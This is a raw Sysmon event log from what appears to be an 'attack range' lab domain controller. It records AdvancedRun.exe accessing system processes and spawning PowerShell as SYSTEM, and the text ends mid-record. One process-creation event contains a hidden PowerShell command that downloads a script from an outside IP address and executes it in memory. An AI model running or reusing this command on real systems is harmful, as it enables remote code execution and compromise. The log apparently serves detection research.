10341000x80000000000000004078218Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:38.217{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47bc0|C:\Windows\System32\SHELL32.dll+62d6c|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004078217Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:38.217{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62d40|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004078216Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:38.217{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d549|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 154100x80000000000000004077910Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.059{834264DD-14A3-61EB-9308-000000002702}1952C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoExit -executionpolicy bypass -File "powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://34.218.235.219:80/b'))""C:\Windows\System32\NT AUTHORITY\SYSTEM{834264DD-DAE4-61EA-E703-000000000000}0x3e72SystemMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe"C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe" /cfg C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.cfgATTACKRANGE\Administrator 10341000x80000000000000004077909Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.058{834264DD-DAE7-61EA-1700-000000002702}13003532C:\Windows\System32\svchost.exe{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\seclogon.dll+1404|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004077908Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.058{834264DD-DAE7-61EA-1700-000000002702}13003532C:\Windows\System32\svchost.exe{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x14c0C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\seclogon.dll+128d|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004077907Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.057{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21f3|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21bd|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077906Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.057{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-132D-61EB-5B08-000000002702}5868C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077905Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.056{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-132D-61EB-5A08-000000002702}4608c:\windows\syswow64\windowspowershell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077904Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.055{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-132A-61EB-5908-000000002702}1164C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077903Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.055{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-132A-61EB-5808-000000002702}3136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077902Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.055{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-12C7-61EB-4508-000000002702}2204C:\Windows\system32\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004077901Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.055{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0F7E-61EB-C807-000000002702}3452C:\Program Files\OpenJDK\jdk-17.0.1\bin\java.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004077900Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.054{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0F7E-61EB-C707-000000002702}2228C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004077899Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.054{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0F7E-61EB-C607-000000002702}2224C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004077898Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.053{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-003D-61EB-F905-000000002702}2420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077897Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.053{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-003D-61EB-F805-000000002702}2928C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077896Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.052{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-003D-61EB-F705-000000002702}6000C:\Windows\System32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2